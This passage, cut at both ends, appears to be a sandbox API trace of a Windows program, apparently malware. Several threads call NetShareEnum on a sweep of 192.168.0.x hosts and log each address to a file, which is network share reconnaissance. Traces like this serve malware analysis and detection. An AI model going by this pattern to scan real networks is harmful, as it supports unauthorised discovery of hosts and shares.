lpNumberOfBytesWritten=0x6a9fc54*=0x11, lpOverlapped=0x0) returned 1 [0144.885] NetShareEnum (in: servername="\\\\192.168.0.126", level=0x1, bufptr=0x6a9fedc, prefmaxlen=0xffffffff, entriesread=0x6a9fed4, totalentries=0x6a9fed0, resume_handle=0x6a9fecc | out: bufptr=0x6a9fedc, entriesread=0x6a9fed4, totalentries=0x6a9fed0, resume_handle=0x6a9fecc) returned 0x35 [0178.146] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.142", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.146] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.142", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.142", lpUsedDefaultChar=0x0) returned 15 [0178.146] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6a9ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.146] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.146] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.146] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6a9ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.146] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.146] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.146] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x6a9fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x6a9fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.150] NetShareEnum (in: servername="\\\\192.168.0.142", level=0x1, bufptr=0x6a9fedc, prefmaxlen=0xffffffff, entriesread=0x6a9fed4, totalentries=0x6a9fed0, resume_handle=0x6a9fecc | out: bufptr=0x6a9fedc, entriesread=0x6a9fed4, totalentries=0x6a9fed0, resume_handle=0x6a9fecc) returned 0x35 [0211.162] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.209", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.162] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.209", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.209", lpUsedDefaultChar=0x0) returned 15 [0211.162] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6a9ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.162] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.162] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.162] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6a9ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.162] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.162] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.162] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x6a9fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x6a9fc54*=0x11, lpOverlapped=0x0) returned 1 [0211.167] NetShareEnum (in: servername="\\\\192.168.0.209", level=0x1, bufptr=0x6a9fedc, prefmaxlen=0xffffffff, entriesread=0x6a9fed4, totalentries=0x6a9fed0, resume_handle=0x6a9fecc | out: bufptr=0x6a9fedc, entriesread=0x6a9fed4, totalentries=0x6a9fed0, resume_handle=0x6a9fecc) returned 0x35 [0257.970] SetEvent (hEvent=0x1dc) returned 1 [0257.970] RtlExitUserThread (Status=0x0) Thread: id = 79 os_tid = 0xcf0 [0089.166] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.58", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0089.166] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.58", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.58", lpUsedDefaultChar=0x0) returned 14 [0089.166] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6bdec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0089.166] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0089.166] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0089.166] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6bdec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0089.166] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0089.166] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0089.166] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x6bdfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x6bdfc54*=0x10, lpOverlapped=0x0) returned 1 [0089.172] NetShareEnum (in: servername="\\\\192.168.0.58", level=0x1, bufptr=0x6bdfedc, prefmaxlen=0xffffffff, entriesread=0x6bdfed4, totalentries=0x6bdfed0, resume_handle=0x6bdfecc | out: bufptr=0x6bdfedc, entriesread=0x6bdfed4, totalentries=0x6bdfed0, resume_handle=0x6bdfecc) returned 0x35 [0144.873] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.125", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0144.873] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.125", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.125", lpUsedDefaultChar=0x0) returned 15 [0144.873] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6bdec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.873] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.873] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.873] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6bdec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.873] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.873] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.873] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x6bdfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x6bdfc54*=0x11, lpOverlapped=0x0) returned 1 [0144.877] NetShareEnum (in: servername="\\\\192.168.0.125", level=0x1, bufptr=0x6bdfedc, prefmaxlen=0xffffffff, entriesread=0x6bdfed4, totalentries=0x6bdfed0, resume_handle=0x6bdfecc | out: bufptr=0x6bdfedc, entriesread=0x6bdfed4, totalentries=0x6bdfed0, resume_handle=0x6bdfecc) returned 0x35 [0178.131] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.141", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.131] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.141", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.141", lpUsedDefaultChar=0x0) returned 15 [0178.131] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6bdec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.131] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.131] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.131] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6bdec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.132] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.132] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.132] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x6bdfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x6bdfc54*=0x11, lpOverlapped=0x0) returned 1 [0178.136] NetShareEnum (in: servername="\\\\192.168.0.141", level=0x1, bufptr=0x6bdfedc, prefmaxlen=0xffffffff, entriesread=0x6bdfed4, totalentries=0x6bdfed0, resume_handle=0x6bdfecc | out: bufptr=0x6bdfedc, entriesread=0x6bdfed4, totalentries=0x6bdfed0, resume_handle=0x6bdfecc) returned 0x35 [0211.162] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.210", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.162] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.210", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.210", lpUsedDefaultChar=0x0) returned 15 [0211.162] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6bdec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.162] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.163] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.163] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6bdec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.163] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.163] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.163] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6bdfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x6bdfc54*=0x22, lpOverlapped=0x0) returned 1 [0211.252] NetShareEnum (in: servername="\\\\192.168.0.210", level=0x1, bufptr=0x6bdfedc, prefmaxlen=0xffffffff, entriesread=0x6bdfed4, totalentries=0x6bdfed0, resume_handle=0x6bdfecc | out: bufptr=0x6bdfedc, entriesread=0x6bdfed4, totalentries=0x6bdfed0, resume_handle=0x6bdfecc) returned 0x35 [0257.940] SetEvent (hEvent=0x1dc) returned 1 [0257.940] RtlExitUserThread (Status=0x0) Thread: id = 80 os_tid = 0xcf4 [0089.916] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.63", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0089.916] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.63", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.63", lpUsedDefaultChar=0x0) returned 14 [0089.916] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6d1ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0089.916] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0089.916] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0089.916] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6d1ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0089.916] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0089.916] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0089.916] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x6d1fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x6d1fc54*=0x10, lpOverlapped=0x0) returned 1 [0089.949] NetShareEnum (in: servername="\\\\192.168.0.63", level=0x1, bufptr=0x6d1fedc, prefmaxlen=0xffffffff, entriesread=0x6d1fed4, totalentries=0x6d1fed0, resume_handle=0x6d1fecc | out: bufptr=0x6d1fedc, entriesread=0x6d1fed4, totalentries=0x6d1fed0, resume_handle=0x6d1fecc) returned 0x35 [0144.551] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.122", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0144.551] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.122", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.122", lpUsedDefaultChar=0x0) returned 15 [0144.551] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6d1ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.551] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.551] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.552] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6d1ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.552] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.552] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.552] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x6d1fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x6d1fc54*=0x11, lpOverlapped=0x0) returned 1 [0144.556] NetShareEnum (in: servername="\\\\192.168.0.122", level=0x1, bufptr=0x6d1fedc, prefmaxlen=0xffffffff, entriesread=0x6d1fed4, totalentries=0x6d1fed0, resume_handle=0x6d1fecc | out: bufptr=0x6d1fedc, entriesread=0x6d1fed4, totalentries=0x6d1fed0, resume_handle=0x6d1fecc) returned 0x35 [0178.163] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.145", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.163] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.145", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.145", lpUsedDefaultChar=0x0) returned 15 [0178.163] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6d1ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.163] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.163] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.163] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6d1ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.164] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.164] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.164] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x6d1fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x6d1fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.167] NetShareEnum (in: servername="\\\\192.168.0.145", level=0x1, bufptr=0x6d1fedc, prefmaxlen=0xffffffff, entriesread=0x6d1fed4, totalentries=0x6d1fed0, resume_handle=0x6d1fecc | out: bufptr=0x6d1fedc, entriesread=0x6d1fed4, totalentries=0x6d1fed0, resume_handle=0x6d1fecc) returned 0x35 [0211.176] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.212", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.176] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.212", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.212", lpUsedDefaultChar=0x0) returned 15 [0211.176] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6d1ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.176] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.176] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.176] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6d1ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.176] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.176] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, 